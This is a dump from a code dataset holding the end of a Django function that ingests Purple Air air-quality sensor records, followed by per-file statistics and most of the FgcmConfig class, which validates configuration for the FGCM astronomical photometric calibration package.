            print('Unexpected HTTP status code for ' + settings.PDK_EXTERNAL_SENSORS_PURPLE_AIR_URL+ ' - ' + str(response.status_code))
    return sensors
def ingest_sensor_data(sensor_data):
    """Ingest a single annotated Purple Air sensor record.

    Only records carrying a 'purpleair-' pdk_identifier plus
    'pdk_observed', 'Lat', and 'Lon' keys are processed.  Side effects:
    may create a SensorModel and a Sensor, creates or extends a
    SensorLocation, and stores a SensorDataPayload when the observation
    is newer than anything already stored.  Mutates sensor_data by
    deleting the 'pdk_observed' key.
    """
    if 'pdk_identifier' in sensor_data:
        identifier = sensor_data['pdk_identifier']
        if identifier.startswith('purpleair-') and ('pdk_observed' in sensor_data) and ('Lat' in sensor_data) and ('Lon' in sensor_data):
            model = None
            if 'Type' in sensor_data:
                # Look up the hardware model by slugified type; create it
                # lazily on first sight.
                model = SensorModel.objects.filter(identifier=slugify(sensor_data['Type'])).first()
                if model is None:
                    model = SensorModel(identifier=slugify(sensor_data['Type']), name=sensor_data['Type'])
                    model.manufacturer = 'Unknown (via Purple Air)'
                    model.save()
            sensor = Sensor.objects.filter(identifier=identifier).first()
            now = timezone.now()
            if sensor is None:
                # First sighting of this sensor: create it.
                sensor = Sensor(identifier=identifier)
                if 'Label' in sensor_data:
                    sensor.name = sensor_data['Label'].strip()
                else:
                    sensor.name = identifier
                sensor.added = now
                sensor.model = model
                sensor.save()
            sensor.last_checked = now
            sensor.save()
            payload_when = sensor_data['pdk_observed']
            # Drop the synthetic key so it is not serialized into the payload.
            del sensor_data['pdk_observed']
            sensor_location = GEOSGeometry('POINT(%f %f)' % (sensor_data['Lon'], sensor_data['Lat'],))
            last_location = sensor.locations.all().order_by('-last_observed').first()
            # Start a new location record if the sensor moved beyond the
            # 0.00001 distance threshold (coordinate units); otherwise
            # extend the current record's last_observed time.
            if last_location is None or last_location.location.distance(sensor_location) > 0.00001:
                last_location = SensorLocation.objects.create(sensor=sensor, first_observed=now, last_observed=now, location=sensor_location)
            else:
                if last_location.last_observed != payload_when:
                    last_location.last_observed = payload_when
                    last_location.save()
            # Store the payload only if nothing at/after this time exists.
            last_payload = sensor.data_payloads.filter(observed__gte=payload_when).first()
            if last_payload is None:
                print('ADDING PAYLOAD...')
                data_payload = SensorDataPayload(sensor=sensor, observed=payload_when, location=last_location)
                data_payload.definition = sensor_data
                data_payload.save()
| 38.035714
| 141
| 0.603286
| 456
| 4,260
| 5.425439
| 0.27193
| 0.076799
| 0.029103
| 0.031528
| 0.135812
| 0.110752
| 0.110752
| 0.033145
| 0
| 0
| 0
| 0.00335
| 0.299296
| 4,260
| 111
| 142
| 38.378378
| 0.825461
| 0.033099
| 0
| 0.081081
| 0
| 0
| 0.086048
| 0.008508
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027027
| false
| 0.013514
| 0.121622
| 0
| 0.162162
| 0.054054
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a339496b618754603c49253c77c1461b236400c0
| 37,496
|
py
|
Python
|
fgcm/fgcmConfig.py
|
erykoff/fgcm
|
51c39c5c7f904fbac755e775038730b4e6ba11bd
|
[
"Apache-2.0"
] | 5
|
2018-02-02T15:36:46.000Z
|
2021-05-11T21:54:49.000Z
|
fgcm/fgcmConfig.py
|
erykoff/fgcm
|
51c39c5c7f904fbac755e775038730b4e6ba11bd
|
[
"Apache-2.0"
] | 1
|
2021-08-19T19:56:33.000Z
|
2021-08-19T19:56:33.000Z
|
fgcm/fgcmConfig.py
|
lsst/fgcm
|
51c39c5c7f904fbac755e775038730b4e6ba11bd
|
[
"Apache-2.0"
] | 10
|
2019-01-09T22:50:04.000Z
|
2020-02-12T16:36:27.000Z
|
import numpy as np
import os
import sys
import yaml
from .fgcmUtilities import FocalPlaneProjectorFromOffsets
from .fgcmLogger import FgcmLogger
class ConfigField(object):
    """
    Descriptor for a configuration entry with a default value, an
    optional required flag, a strict datatype check, and an optional
    length check.  np.ndarray-typed fields coerce values through
    np.atleast_1d on construction and assignment.  The value is stored
    on the descriptor object itself.
    """
    def __init__(self, datatype, value=None, default=None, required=False, length=None):
        self._datatype = datatype
        self._value = value
        self._required = required
        self._length = length

        effective_default = default
        if self._datatype == np.ndarray:
            # Coerce scalars/sequences to at-least-1d arrays.
            if default is not None:
                effective_default = np.atleast_1d(default)
            if value is not None:
                self._value = np.atleast_1d(value)

        if datatype is not None:
            # Exact type match (not isinstance) is deliberate here.
            if effective_default is not None and type(effective_default) != datatype:
                raise TypeError("Default is the wrong datatype.")
            if self._value is not None and type(self._value) != datatype:
                raise TypeError("Value is the wrong datatype.")

        if self._value is None:
            self._value = effective_default

    def __get__(self, obj, type=None):
        return self._value

    def __set__(self, obj, value):
        # need to convert to numpy array if necessary
        if self._datatype == np.ndarray:
            self._value = np.atleast_1d(value)
        else:
            self._value = value

    def validate(self, name):
        """Raise ValueError if the field violates its constraints; else True."""
        if self._required and self._value is None:
            raise ValueError("Required ConfigField %s is not set" % (name))
        if self._value is None:
            # Okay to have None for not required
            return True
        if self._datatype is not None and type(self._value) != self._datatype:
            raise ValueError("Datatype mismatch for %s (got %s, expected %s)" %
                             (name, str(type(self._value)), str(self._datatype)))
        if self._length is not None and len(self._value) != self._length:
            raise ValueError("ConfigField %s has the wrong length (%d != %d)" %
                             (name, len(self._value), self._length))
        return True
class FgcmConfig(object):
"""
Class which contains the FGCM Configuration. Note that if you have fits files
as input, use configWithFits(configDict) to initialize.
parameters
----------
configDict: dict
Dictionary with configuration values
lutIndex: numpy recarray
All the information from the LUT index values
lutStd: numpy recarray
All the information from the LUT standard values
expInfo: numpy recarray
Info about each exposure
checkFiles: bool, default=False
Check that all fits files exist
noOutput: bool, default=False
Do not create an output directory.
ccdOffsets : `np.ndarray`, optional
CCD Offset table.
focalPlaneProjector : `FocalPlaneProjector`, optional
A focal plane projector object to generate the
focal plane mapping at an arbitrary angle.
"""
bands = ConfigField(list, required=True)
fitBands = ConfigField(list, required=True)
notFitBands = ConfigField(list, required=True)
requiredBands = ConfigField(list, required=True)
filterToBand = ConfigField(dict, required=True)
exposureFile = ConfigField(str, required=False)
ccdOffsetFile = ConfigField(str, required=False)
obsFile = ConfigField(str, required=False)
indexFile = ConfigField(str, required=False)
refstarFile = ConfigField(str, required=False)
UTBoundary = ConfigField(float, default=0.0)
washMJDs = ConfigField(np.ndarray, default=np.array((0.0)))
epochMJDs = ConfigField(np.ndarray, default=np.array((0.0, 1e10)))
coatingMJDs = ConfigField(np.ndarray, default=np.array((0.0)))
epochNames = ConfigField(list, required=False)
lutFile = ConfigField(str, required=False)
expField = ConfigField(str, default='EXPNUM')
ccdField = ConfigField(str, default='CCDNUM')
latitude = ConfigField(float, required=True)
defaultCameraOrientation = ConfigField(float, default=0.0)
seeingField = ConfigField(str, default='SEEING')
seeingSubExposure = ConfigField(bool, default=False)
deepFlag = ConfigField(str, default='DEEPFLAG')
fwhmField = ConfigField(str, default='PSF_FWHM')
skyBrightnessField = ConfigField(str, default='SKYBRIGHTNESS')
minObsPerBand = ConfigField(int, default=2)
minObsPerBandFill = ConfigField(int, default=1)
nCore = ConfigField(int, default=1)
randomSeed = ConfigField(int, required=False)
logger = ConfigField(None, required=False)
outputFgcmcalZpts = ConfigField(bool, default=False)
brightObsGrayMax = ConfigField(float, default=0.15)
minStarPerCCD = ConfigField(int, default=5)
minStarPerExp = ConfigField(int, default=100)
minCCDPerExp = ConfigField(int, default=5)
maxCCDGrayErr = ConfigField(float, default=0.05)
ccdGraySubCCDDict = ConfigField(dict, default={})
ccdGraySubCCDChebyshevOrder = ConfigField(int, default=1)
ccdGraySubCCDTriangular = ConfigField(bool, default=True)
ccdGrayFocalPlaneDict = ConfigField(dict, default={})
ccdGrayFocalPlaneChebyshevOrder = ConfigField(int, default=3)
focalPlaneSigmaClip = ConfigField(float, default=4.0)
ccdGrayFocalPlaneFitMinCcd = ConfigField(int, default=1)
aperCorrFitNBins = ConfigField(int, default=5)
aperCorrInputSlopeDict = ConfigField(dict, default={})
illegalValue = ConfigField(float, default=-9999.0)
sedBoundaryTermDict = ConfigField(dict, required=True)
sedTermDict = ConfigField(dict, required=True)
starColorCuts = ConfigField(list, required=True)
quantityCuts = ConfigField(list, default=[])
cycleNumber = ConfigField(int, default=0)
outfileBase = ConfigField(str, required=True)
maxIter = ConfigField(int, default=50)
deltaMagBkgOffsetPercentile = ConfigField(float, default=0.25)
deltaMagBkgPerCcd = ConfigField(bool, default=False)
sigFgcmMaxErr = ConfigField(float, default=0.01)
sigFgcmMaxEGrayDict = ConfigField(dict, default={})
ccdGrayMaxStarErr = ConfigField(float, default=0.10)
mirrorArea = ConfigField(float, required=True) # cm^2
cameraGain = ConfigField(float, required=True)
approxThroughputDict = ConfigField(dict, default={})
ccdStartIndex = ConfigField(int, default=0)
minExpPerNight = ConfigField(int, default=10)
expGrayInitialCut = ConfigField(float, default=-0.25)
expVarGrayPhotometricCutDict = ConfigField(dict, default={})
expGrayPhotometricCutDict = ConfigField(dict, required=True)
expGrayRecoverCut = ConfigField(float, default=-1.0)
expGrayHighCutDict = ConfigField(dict, required=True)
expGrayErrRecoverCut = ConfigField(float, default=0.05)
sigmaCalRange = ConfigField(list, default=[0.001, 0.003], length=2)
sigmaCalFitPercentile = ConfigField(list, default=[0.05, 0.15], length=2)
sigmaCalPlotPercentile = ConfigField(list, default=[0.05, 0.95], length=2)
sigma0Phot = ConfigField(float, default=0.003)
logLevel = ConfigField(str, default='INFO')
quietMode = ConfigField(bool, default=False)
useRepeatabilityForExpGrayCutsDict = ConfigField(dict, default={})
mapLongitudeRef = ConfigField(float, default=0.0)
autoPhotometricCutNSig = ConfigField(float, default=3.0)
autoPhotometricCutStep = ConfigField(float, default=0.0025)
autoHighCutNSig = ConfigField(float, default=4.0)
instrumentParsPerBand = ConfigField(bool, default=False)
instrumentSlopeMinDeltaT = ConfigField(float, default=5.0)
refStarSnMin = ConfigField(float, default=20.0)
refStarOutlierNSig = ConfigField(float, default=4.0)
applyRefStarColorCuts = ConfigField(bool, default=True)
useRefStarsWithInstrument = ConfigField(bool, default=True)
mapNSide = ConfigField(int, default=256)
nStarPerRun = ConfigField(int, default=200000)
nExpPerRun = ConfigField(int, default=1000)
varNSig = ConfigField(float, default=100.0)
varMinBand = ConfigField(int, default=2)
useSedLUT = ConfigField(bool, default=False)
modelMagErrors = ConfigField(bool, default=False)
freezeStdAtmosphere = ConfigField(bool, default=False)
reserveFraction = ConfigField(float, default=0.1)
precomputeSuperStarInitialCycle = ConfigField(bool, default=False)
useRetrievedPwv = ConfigField(bool, default=False)
useNightlyRetrievedPwv = ConfigField(bool, default=False)
useQuadraticPwv = ConfigField(bool, default=False)
pwvRetrievalSmoothBlock = ConfigField(int, default=25)
fitMirrorChromaticity = ConfigField(bool, default=False)
useRetrievedTauInit = ConfigField(bool, default=False)
tauRetrievalMinCCDPerNight = ConfigField(int, default=100)
superStarSubCCDDict = ConfigField(dict, default={})
superStarSubCCDChebyshevOrder = ConfigField(int, default=1)
superStarSubCCDTriangular = ConfigField(bool, default=False)
superStarSigmaClip = ConfigField(float, default=5.0)
clobber = ConfigField(bool, default=False)
printOnly = ConfigField(bool, default=False)
outputStars = ConfigField(bool, default=False)
fillStars = ConfigField(bool, default=False)
outputZeropoints = ConfigField(bool, default=False)
outputPath = ConfigField(str, required=False)
saveParsForDebugging = ConfigField(bool, default=False)
doPlots = ConfigField(bool, default=True)
pwvFile = ConfigField(str, required=False)
externalPwvDeltaT = ConfigField(float, default=0.1)
tauFile = ConfigField(str, required=False)
externalTauDeltaT = ConfigField(float, default=0.1)
fitGradientTolerance = ConfigField(float, default=1e-5)
stepUnitReference = ConfigField(float, default=0.0001)
experimentalMode = ConfigField(bool, default=False)
resetParameters = ConfigField(bool, default=True)
noChromaticCorrections = ConfigField(bool, default=False)
colorSplitBands = ConfigField(list, default=['g', 'i'], length=2)
expGrayCheckDeltaT = ConfigField(float, default=10. / (24. * 60.))
modelMagErrorNObs = ConfigField(int, default=100000)
inParameterFile = ConfigField(str, required=False)
inFlagStarFile = ConfigField(str, required=False)
zpsToApplyFile = ConfigField(str, required=False)
maxFlagZpsToApply = ConfigField(int, default=2)
def __init__(self, configDict, lutIndex, lutStd, expInfo, checkFiles=False, noOutput=False, ccdOffsets=None, focalPlaneProjector=None):
    """
    Construct the fit-cycle configuration.

    Copies configDict onto the instance and validates it, sets up output
    paths and logging, cross-checks band/filter definitions against the
    look-up table (LUT), records LUT standard-atmosphere values, converts
    per-band config dicts to band-ordered arrays/lists, and crops the
    epoch/wash/coating MJD lists to the exposure MJD range.

    Parameters
    ----------
    configDict : `dict`
        Configuration values; keys must match the ConfigField class
        attributes.  May also carry an optional 'logger'.
    lutIndex : indexable
        LUT index table ('NCCD', 'FILTERNAMES', 'STDFILTERNAMES', 'PMB',
        'PWV', 'O3', 'TAU', 'ALPHA', 'ZENITH').
    lutStd : indexable
        LUT standard values ('PMBSTD', 'PWVSTD', 'O3STD', 'TAUSTD', ...).
    expInfo : record array
        Exposure table; must contain self.expField and 'MJD'.
    checkFiles : `bool`, optional
        Require inParameterFile/inFlagStarFile when cycleNumber >= 1.
    noOutput : `bool`, optional
        Do not create the output directory.
    ccdOffsets : record array, optional
        Legacy CCD offset table (mutually exclusive with focalPlaneProjector).
    focalPlaneProjector : object, optional
        Focal-plane projector (mutually exclusive with ccdOffsets).
    """
    self._setVarsFromDict(configDict)
    self._setDefaultLengths()
    self.validate()
    # First thing: set the random seed if desired
    if self.randomSeed is not None:
        np.random.seed(seed=self.randomSeed)
    # Default the output path to the current working directory.
    if self.outputPath is None:
        self.outputPath = os.path.abspath('.')
    else:
        self.outputPath = os.path.abspath(self.outputPath)
    # create output path if necessary
    if not noOutput:
        if (not os.path.isdir(self.outputPath)):
            try:
                os.makedirs(self.outputPath)
            except:
                # NOTE(review): bare except also swallows KeyboardInterrupt.
                raise IOError("Could not create output path: %s" % (self.outputPath))
    if (self.cycleNumber < 0):
        raise ValueError("Illegal cycleNumber: must be >= 0")
    # Reset; only re-read from configDict below when checkFiles is set.
    self.inParameterFile = None
    self.inFlagStarFile = None
    if (self.cycleNumber >= 1) and checkFiles:
        if ('inParameterFile' not in configDict):
            raise ValueError("Must provide inParameterFile for cycleNumber > 0")
        self.inParameterFile = configDict['inParameterFile']
        if ('inFlagStarFile' not in configDict):
            raise ValueError("Must provide inFlagStarFile for cycleNumber > 0")
        self.inFlagStarFile = configDict['inFlagStarFile']
    # Compose per-cycle output names and refuse to clobber an old log.
    self.outfileBaseWithCycle = '%s_cycle%02d' % (self.outfileBase, self.cycleNumber)
    logFile = '%s/%s.log' % (self.outputPath, self.outfileBaseWithCycle)
    if os.path.isfile(logFile) and not self.clobber:
        raise RuntimeError("Found logFile %s, but clobber == False." % (logFile))
    self.plotPath = None
    if self.doPlots:
        self.plotPath = '%s/%s_plots' % (self.outputPath,self.outfileBaseWithCycle)
        if os.path.isdir(self.plotPath) and not self.clobber:
            # Only refuse if the existing plot directory is non-empty.
            if len(os.listdir(self.plotPath)) > 0:
                raise RuntimeError("Found plots in %s, but clobber == False." % (self.plotPath))
    # Set up the logger: internal FgcmLogger unless one was supplied.
    if ('logger' not in configDict):
        self.externalLogger = False
        self.fgcmLog = FgcmLogger('%s/%s.log' % (self.outputPath,
                                                 self.outfileBaseWithCycle),
                                  self.logLevel, printLogger=configDict['printOnly'])
        if configDict['printOnly']:
            self.fgcmLog.info('Logging to console')
        else:
            self.fgcmLog.info('Logging started to %s' % (self.fgcmLog.logFile))
    else:
        # Support an external logger such as LSST that has .info() and .debug() calls
        self.externalLogger = True
        self.fgcmLog = configDict['logger']
        try:
            if not self.quietMode:
                self.fgcmLog.info('Logging to external logger.')
        except:
            raise RuntimeError("Logging to configDict['logger'] failed.")
    if (self.experimentalMode) :
        self.fgcmLog.info('ExperimentalMode set to True')
    if (self.resetParameters) :
        self.fgcmLog.info('Will reset atmosphere parameters')
    if (self.noChromaticCorrections) :
        self.fgcmLog.warning('No chromatic corrections will be applied. I hope this is what you wanted for a test!')
    if (self.plotPath is not None and not os.path.isdir(self.plotPath)):
        try:
            os.makedirs(self.plotPath)
        except:
            # NOTE(review): bare except also swallows KeyboardInterrupt.
            raise IOError("Could not create plot path: %s" % (self.plotPath))
    if (self.illegalValue >= 0.0):
        raise ValueError("Must set illegalValue to a negative number")
    # and look at the lutFile
    self.nCCD = lutIndex['NCCD'][0]
    # these are np arrays and encoded as such; decode bytes when present
    try:
        self.lutFilterNames = [n.decode('utf-8') for n in lutIndex['FILTERNAMES'][0]]
    except AttributeError:
        self.lutFilterNames = [n for n in lutIndex['FILTERNAMES'][0]]
    try:
        self.lutStdFilterNames = [n.decode('utf-8') for n in lutIndex['STDFILTERNAMES'][0]]
    except AttributeError:
        self.lutStdFilterNames = [n for n in lutIndex['STDFILTERNAMES'][0]]
    # Valid [min, max] ranges of the LUT atmosphere grid.
    self.pmbRange = np.array([np.min(lutIndex['PMB']),np.max(lutIndex['PMB'])])
    self.pwvRange = np.array([np.min(lutIndex['PWV']),np.max(lutIndex['PWV'])])
    self.O3Range = np.array([np.min(lutIndex['O3']),np.max(lutIndex['O3'])])
    self.tauRange = np.array([np.min(lutIndex['TAU']),np.max(lutIndex['TAU'])])
    self.alphaRange = np.array([np.min(lutIndex['ALPHA']),np.max(lutIndex['ALPHA'])])
    self.zenithRange = np.array([np.min(lutIndex['ZENITH']),np.max(lutIndex['ZENITH'])])
    # newer band checks
    # 1) check that all the filters in filterToBand are in lutFilterNames
    # 2) check that all the lutStdFilterNames are lutFilterNames (redundant)
    # 3) check that each band has ONE standard filter
    # 4) check that all the fitBands are in bands
    # 5) check that all the notFitBands are in bands
    # 6) check that all the requiredBands are in bands
    # 1) check that all the filters in filterToBand are in lutFilterNames
    for filterName in self.filterToBand:
        if filterName not in self.lutFilterNames:
            raise ValueError("Filter %s in filterToBand not in LUT" % (filterName))
    # 2) check that all the lutStdFilterNames are lutFilterNames (redundant)
    for lutStdFilterName in self.lutStdFilterNames:
        if lutStdFilterName not in self.lutFilterNames:
            raise ValueError("lutStdFilterName %s not in list of lutFilterNames" % (lutStdFilterName))
    # 3) check that each band has ONE standard filter
    # -1 marks "no standard filter found yet" for that band.
    bandStdFilterIndex = np.zeros(len(self.bands), dtype=np.int32) - 1
    for i, band in enumerate(self.bands):
        for j, filterName in enumerate(self.lutFilterNames):
            # Not every LUT filter must be in the filterToBand mapping.
            # If it is not there, it will not be used.
            if filterName in self.filterToBand:
                if self.filterToBand[filterName] == band:
                    # If we haven't found it yet, set the index
                    ind = list(self.lutFilterNames).index(self.lutStdFilterNames[j])
                    if bandStdFilterIndex[i] < 0:
                        bandStdFilterIndex[i] = ind
                    else:
                        if self.lutStdFilterNames[ind] != self.lutStdFilterNames[bandStdFilterIndex[i]]:
                            raise ValueError("Band %s has multiple standard filters (%s, %s)" %
                                             (band, self.lutStdFilterNames[ind],
                                              self.lutStdFilterNames[bandStdFilterIndex[i]]))
    # 4) check that all the fitBands are in bands
    for fitBand in self.fitBands:
        if fitBand not in self.bands:
            raise ValueError("Band %s from fitBands not in full bands" % (fitBand))
    # 5) check that all the notFitBands are in bands
    for notFitBand in self.notFitBands:
        if notFitBand not in self.bands:
            raise ValueError("Band %s from notFitBands not in full bands" % (notFitBand))
    # 6) check that all the requiredBands are in bands
    for requiredBand in self.requiredBands:
        if requiredBand not in self.bands:
            raise ValueError("Band %s from requiredBands not in full bands" % (requiredBand))
    bandString = " ".join(self.bands)
    self.fgcmLog.info('Found %d CCDs and %d bands (%s)' %
                      (self.nCCD,len(self.bands),bandString))
    # get LUT standard values
    self.pmbStd = lutStd['PMBSTD'][0]
    self.pwvStd = lutStd['PWVSTD'][0]
    self.lnPwvStd = np.log(lutStd['PWVSTD'][0])
    self.o3Std = lutStd['O3STD'][0]
    self.tauStd = lutStd['TAUSTD'][0]
    self.lnTauStd = np.log(lutStd['TAUSTD'][0])
    self.alphaStd = lutStd['ALPHASTD'][0]
    self.zenithStd = lutStd['ZENITHSTD'][0]
    # Cut the LUT filter names to those that are actually used
    usedFilterNames = self.filterToBand.keys()
    usedLutFilterMark = np.zeros(len(self.lutFilterNames), dtype=bool)
    for i, f in enumerate(self.lutFilterNames):
        if f in usedFilterNames:
            usedLutFilterMark[i] = True
    self.lutFilterNames = [f for i, f in enumerate(self.lutFilterNames) if usedLutFilterMark[i]]
    self.lutStdFilterNames = [f for i, f in enumerate(self.lutStdFilterNames) if usedLutFilterMark[i]]
    # And the lambdaStd and I10Std, for each *band*
    # NOTE(review): bandStdFilterIndex was computed on the pre-cut filter
    # list; assumes indices remain valid after the cut — confirm upstream.
    self.lambdaStdBand = lutStd['LAMBDASTD'][0][bandStdFilterIndex]
    self.I10StdBand = lutStd['I10STD'][0][bandStdFilterIndex]
    self.I0StdBand = lutStd['I0STD'][0][bandStdFilterIndex]
    self.I1StdBand = lutStd['I1STD'][0][bandStdFilterIndex]
    self.I2StdBand = lutStd['I2STD'][0][bandStdFilterIndex]
    self.lambdaStdFilter = lutStd['LAMBDASTDFILTER'][0][usedLutFilterMark]
    # Convert per-band config dicts to band-ordered lists/arrays.
    self.ccdGraySubCCD = self._convertDictToBandList(self.ccdGraySubCCDDict,
                                                     bool, False, required=False)
    self.ccdGrayFocalPlane = self._convertDictToBandList(self.ccdGrayFocalPlaneDict,
                                                         bool, False, required=False)
    self.superStarSubCCD = self._convertDictToBandList(self.superStarSubCCDDict,
                                                       bool, False, required=False)
    self.aperCorrInputSlopes = self._convertDictToBandList(self.aperCorrInputSlopeDict,
                                                           float, self.illegalValue,
                                                           ndarray=True, required=False)
    self.sigFgcmMaxEGray = self._convertDictToBandList(self.sigFgcmMaxEGrayDict,
                                                       float, 0.05, required=False)
    self.approxThroughput = self._convertDictToBandList(self.approxThroughputDict,
                                                        float, 1.0, required=False)
    self.expVarGrayPhotometricCut = self._convertDictToBandList(self.expVarGrayPhotometricCutDict,
                                                                float, 0.0005,
                                                                ndarray=True, required=False)
    self.expGrayPhotometricCut = self._convertDictToBandList(self.expGrayPhotometricCutDict,
                                                             float, -0.05,
                                                             ndarray=True, required=True,
                                                             dictName='expGrayPhotometricCutDict')
    self.expGrayHighCut = self._convertDictToBandList(self.expGrayHighCutDict,
                                                      float, 0.10,
                                                      ndarray=True, required=True,
                                                      dictName='expGrayHighCutDict')
    self.useRepeatabilityForExpGrayCuts = self._convertDictToBandList(self.useRepeatabilityForExpGrayCutsDict,
                                                                      bool, False, required=False)
    if self.colorSplitBands[0] not in self.bands or self.colorSplitBands[1] not in self.bands:
        raise RuntimeError("Bands listed in colorSplitBands must be valid bands.")
    self.colorSplitIndices = [self.bands.index(x) for x in self.colorSplitBands]
    # Sign conventions for the gray cuts.
    if (self.expGrayPhotometricCut.max() >= 0.0):
        raise ValueError("expGrayPhotometricCut must all be negative")
    if (self.expGrayHighCut.max() <= 0.0):
        raise ValueError("expGrayHighCut must all be positive")
    if self.sigmaCalRange[1] < self.sigmaCalRange[0]:
        raise ValueError("sigmaCalRange[1] must me equal to or larger than sigmaCalRange[0]")
    # and look at the exposure file and grab some stats
    self.expRange = np.array([np.min(expInfo[self.expField]),np.max(expInfo[self.expField])])
    self.mjdRange = np.array([np.min(expInfo['MJD']),np.max(expInfo['MJD'])])
    self.nExp = expInfo.size
    # Exactly one of ccdOffsets / focalPlaneProjector must be supplied.
    if ccdOffsets is None and focalPlaneProjector is None:
        raise ValueError("Must supply either ccdOffsets or focalPlaneProjector")
    elif ccdOffsets is not None and focalPlaneProjector is not None:
        raise ValueError("Must supply only one of ccdOffsets or focalPlaneProjector")
    elif focalPlaneProjector is not None:
        self.focalPlaneProjector = focalPlaneProjector
    else:
        # Use old ccd offsets, so create a translator
        self.focalPlaneProjector = FocalPlaneProjectorFromOffsets(ccdOffsets)
    # based on mjdRange, look at epochs; also sort.
    # confirm that we cover all the exposures, and remove excess epochs
    # are they sorted?
    if (self.epochMJDs != np.sort(self.epochMJDs)).any():
        raise ValueError("epochMJDs must be sorted in ascending order")
    test=np.searchsorted(self.epochMJDs,self.mjdRange)
    if test.min() == 0:
        # First exposure falls before the first epoch: pad on the left.
        self.fgcmLog.warning("Exposure start MJD before epoch range. Adding additional epoch.")
        self.epochMJDs = np.insert(self.epochMJDs, 0, self.mjdRange[0] - 1.0)
        if self.epochNames is not None:
            self.epochNames.insert(0, 'epoch-pre')
    if test.max() == self.epochMJDs.size:
        # Last exposure falls after the last epoch: pad on the right.
        self.fgcmLog.warning("Exposure end MJD after epoch range. Adding additional epoch.")
        self.epochMJDs = np.insert(self.epochMJDs, len(self.epochMJDs), self.mjdRange[1] + 1.0)
        if self.epochNames is not None:
            self.epochNames.insert(len(self.epochNames), 'epoch-post')
    if self.epochNames is None:
        self.epochNames = []
        for i in range(self.epochMJDs.size):
            self.epochNames.append('epoch%d' % (i))
    # crop to valid range
    self.epochMJDs = self.epochMJDs[test[0]-1:test[1]+1]
    self.epochNames = self.epochNames[test[0]-1:test[1]+1]
    # and look at washMJDs; also sort
    st=np.argsort(self.washMJDs)
    if (not np.array_equal(st,np.arange(self.washMJDs.size))):
        raise ValueError("Input washMJDs must be in sort order.")
    # keep only wash events strictly inside the observed MJD range
    gd,=np.where((self.washMJDs > self.mjdRange[0]) &
                 (self.washMJDs < self.mjdRange[1]))
    self.washMJDs = self.washMJDs[gd]
    # and the coating MJDs
    st = np.argsort(self.coatingMJDs)
    if (not np.array_equal(st, np.arange(self.coatingMJDs.size))):
        raise ValueError("Input coatingMJDs must be in sort order.")
    gd, = np.where((self.coatingMJDs > self.mjdRange[0]) &
                   (self.coatingMJDs < self.mjdRange[1]))
    self.coatingMJDs = self.coatingMJDs[gd]
    # Deal with fit band, notfit band, required, and notrequired indices
    bandFitFlag = np.zeros(len(self.bands), dtype=bool)
    bandNotFitFlag = np.zeros_like(bandFitFlag)
    bandRequiredFlag = np.zeros_like(bandFitFlag)
    for i, band in enumerate(self.bands):
        if band in self.fitBands:
            bandFitFlag[i] = True
        if band in self.requiredBands:
            bandRequiredFlag[i] = True
        if len(self.notFitBands) > 0:
            if band in self.notFitBands:
                bandNotFitFlag[i] = True
            if band in self.fitBands and band in self.notFitBands:
                raise ValueError("Cannot have the same band in fitBands and notFitBands")
    self.bandFitIndex = np.where(bandFitFlag)[0]
    self.bandNotFitIndex = np.where(bandNotFitFlag)[0]
    self.bandRequiredIndex = np.where(bandRequiredFlag)[0]
    self.bandNotRequiredIndex = np.where(~bandRequiredFlag)[0]
    if np.array_equal(self.bandFitIndex, self.bandRequiredIndex):
        self.allFitBandsAreRequired = True
    else:
        self.allFitBandsAreRequired = False
    # and check the star color cuts and replace with indices...
    # note that self.starColorCuts is a copy so that we don't overwrite.
    for cCut in self.starColorCuts:
        if (not isinstance(cCut[0],int)) :
            if (cCut[0] not in self.bands):
                raise ValueError("starColorCut band %s not in list of bands!" % (cCut[0]))
            cCut[0] = list(self.bands).index(cCut[0])
        if (not isinstance(cCut[1],int)) :
            if (cCut[1] not in self.bands):
                raise ValueError("starColorCut band %s not in list of bands!" % (cCut[1]))
            cCut[1] = list(self.bands).index(cCut[1])
    # Check for input aperture corrections.
    if self.aperCorrFitNBins == 0 and np.any(self.aperCorrInputSlopes == self.illegalValue):
        self.fgcmLog.warning("Aperture corrections will not be fit; strongly recommend setting aperCorrInputSlopeDict")
    # Check the sed mapping dictionaries
    # First, make sure every band is listed in the sedTermDict
    for band in self.bands:
        if band not in self.sedTermDict:
            raise RuntimeError("Band %s not listed in sedTermDict." % (band))
    # Second, make sure sedBoundaryTermDict is correct format
    for boundaryTermName, boundaryTerm in self.sedBoundaryTermDict.items():
        if 'primary' not in boundaryTerm or 'secondary' not in boundaryTerm:
            raise RuntimeError("sedBoundaryTerm %s must have primary and secondary keys." % (boundaryTerm))
        if boundaryTerm['primary'] not in self.bands:
            raise RuntimeError("sedBoundaryTerm %s band %s not in list of bands." %
                               (boundaryTermName, boundaryTerm['primary']))
        if boundaryTerm['secondary'] not in self.bands:
            raise RuntimeError("sedBoundaryTerm %s band %s not in list of bands." %
                               (boundaryTermName, boundaryTerm['secondary']))
    # Third, extract all the terms and bands from sedTermDict, make sure all
    # are defined.
    mapBands = []
    mapTerms = []
    for band in self.sedTermDict:
        sedTerm = self.sedTermDict[band]
        if 'extrapolated' not in sedTerm:
            raise RuntimeError("sedTermDict %s must have 'extrapolated' key." % (band))
        if 'constant' not in sedTerm:
            raise RuntimeError("sedTermDict %s must have 'constant' key." % (band))
        if 'primaryTerm' not in sedTerm:
            raise RuntimeError("sedTermDict %s must have a primaryTerm." % (band))
        if 'secondaryTerm' not in sedTerm:
            raise RuntimeError("sedTermDict %s must have a secondaryTerm." % (band))
        mapTerms.append(sedTerm['primaryTerm'])
        if sedTerm['secondaryTerm'] is not None:
            mapTerms.append(sedTerm['secondaryTerm'])
        if sedTerm['extrapolated']:
            # Extrapolated terms additionally need three anchor bands.
            if sedTerm['secondaryTerm'] is None:
                raise RuntimeError("sedTermDict %s must have a secondaryTerm if extrapolated." % (band))
            if 'primaryBand' not in sedTerm:
                raise RuntimeError("sedTermDict %s must have a primaryBand if extrapolated." % (band))
            if 'secondaryBand' not in sedTerm:
                raise RuntimeError("sedTermDict %s must have a secondaryBand if extrapolated." % (band))
            if 'tertiaryBand' not in sedTerm:
                raise RuntimeError("sedTermDict %s must have a tertiaryBand if extrapolated." % (band))
            mapBands.append(sedTerm['primaryBand'])
